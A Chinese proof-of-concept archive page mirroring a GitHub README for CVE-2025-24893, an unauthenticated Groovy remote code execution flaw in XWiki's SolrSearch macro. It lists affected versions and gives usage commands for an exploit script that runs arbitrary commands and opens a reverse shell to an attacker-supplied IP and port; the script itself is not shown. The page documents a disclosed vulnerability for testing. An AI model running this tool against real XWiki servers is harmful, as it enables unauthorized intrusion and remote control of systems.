支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: b7974396cb2675d6f9c4ff82614df5f6aa15d092

来源
https://github.com/80Ottanta80/CVE-2025-24893-PoC
关联漏洞
标题:XWiki Platform 安全漏洞 (CVE-2025-24893)
描述:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
描述
XWiki Unauthenticated RCE Exploit for Reverse Shell
介绍
# CVE-2025-24893-PoC

XWiki Unauthenticated RCE Exploit

## Affected XWiki Versions

- Versions < 15.10.11
- Versions < 16.4.1  
- Versions < 16.5.0RC1

## Vulnerability Description

Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro. Unauthenticated attackers can execute arbitrary Groovy code remotely and obtain a reverse shell.

## Proof of Concept

This exploit can be used for executing code on the target machine and can also establishes a reverse shell. Two modes are available: interactive or parameter-based. The exploit can automatically start a listener or use an existing one.


![XWiki Interactive Output](images/image1.png)

### Prerequisites

#### Attacker Machine
- Python 3
- The exploit script
- Netcat (if not using the automatic listener)

#### Target Machine
- Vulnerable XWiki version
- Network connectivity to attacker machine

### Usage

#### Interactive Mode
```bash
python3 xwiki_groovy_rce.py
```

#### Parameter Mode
```bash
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
```

#### Parameters
-h/--help: Show the help menu

-u/--url: Target XWiki URL (required)

-r/--reverse-shell: Execute a reverse shell

-c/--command: Execute a single command

-i/--ip: Specify listener IP (for reverse shell only)

-p/--port: Specify listener port (for reverse shell only, default=4444)

--no-listener: Don't start a listener (for reverse shell only)

## Reference
* https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
* https://nvd.nist.gov/vuln/detail/CVE-2025-24893
* https://www.offsec.com/blog/cve-2025-24893/

## Legal Disclaimer

This proof-of-concept is for educational and authorized testing purposes only. 

Unauthorized use against systems you do not own or have explicit permission to test is illegal.

The authors are not responsible for any misuse of this information.
文件快照

 [4.0K]  /data/pocs/b7974396cb2675d6f9c4ff82614df5f6aa15d092
├── [4.0K]  images
│   └── [112K]  image1.png
├── [2.2K]  README.md
└── [ 14K]  xwiki_groovy_rce.py

2 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。